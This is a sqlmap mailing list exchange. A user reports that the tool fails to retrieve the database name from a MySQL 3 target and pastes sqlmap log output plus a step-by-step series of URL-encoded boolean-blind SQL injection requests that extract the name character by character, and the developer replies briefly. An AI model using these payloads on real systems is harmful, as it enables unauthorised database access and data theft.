Re: [sqlmap-users] MySql 3 - sqlMap don't retrieve db name -- Suggestion for new implementation

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

thank you for your tip. will have it on our mind to implement it for MySQL
3 (which is currently of a low priority)

kind regards

On Fri, Mar 30, 2012 at 1:44 PM, Marco Mirandola <mm...@gm...> wrote:

> From this DBMS (MySql 3) SqlMap don't retireve the name of 'Current DB'
>
> [13:38:33] [INFO] resuming back-end DBMS 'mysql 3' from session file
> [13:38:33] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> reque
> sts:
> ---
> Place: GET
> Parameter: ID
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: ID=26 AND 1443=1443
> ---
> [13:38:38] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Red Hat 7.2 or 7.3 or 7.1 (Seawolf or
> Enigma
> or Valhalla)
> web application technology: PHP 4.4.2, Apache 1.3.27
> back-end DBMS: MySQL 3
> [13:38:38] [WARNING] information_schema not available, back-end DBMS is
> MySQL <
> 5. database names will be fetched from 'mysql' database
> [13:38:38] [INFO] fetching number of databases
> [13:38:38] [WARNING] running in a single-thread mode. Please consider
> usage of o
> ption '--threads' for faster data retrieval
> [13:38:38] [INFO] retrieved:
> [13:38:57] [ERROR] unable to retrieve the number of databases
> [13:38:57] [INFO] falling back to current database
> [13:38:57] [INFO] fetching current database
> [13:38:57] [INFO] retrieved:
> [13:39:41] [CRITICAL] unable to retrieve the database names
>
> This is the correct sequence to implement:
>
> Get length of database (Length of 'Current DB' is 3)
> ?ID=26+and+Length%28%28database%28%29%29%29%3C32
> ?ID=26+and+Length%28%28database%28%29%29%29%3C16
> ?ID=26+and+Length%28%28database%28%29%29%29%3C8
> ?ID=26+and+Length%28%28database%28%29%29%29%3C4
> ?ID=26+and+Length%28%28database%28%29%29%29%3D3
>
> Try to get the name of database (Name of 'Current DB' is die)
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C91
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C97
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D102
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D101
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C109
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C106
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D105
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C91
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C97
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C100
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D102
> ?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D101
>
> Best regards
>
>
> ------------------------------------------------------------------------------
> This SF email is sponsosred by:
> Try Windows Azure free for 90 days Click Here
> http://p.sf.net/sfu/sfd2d-msazure
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

-- 
Miroslav Stampar
http://about.me/stamparm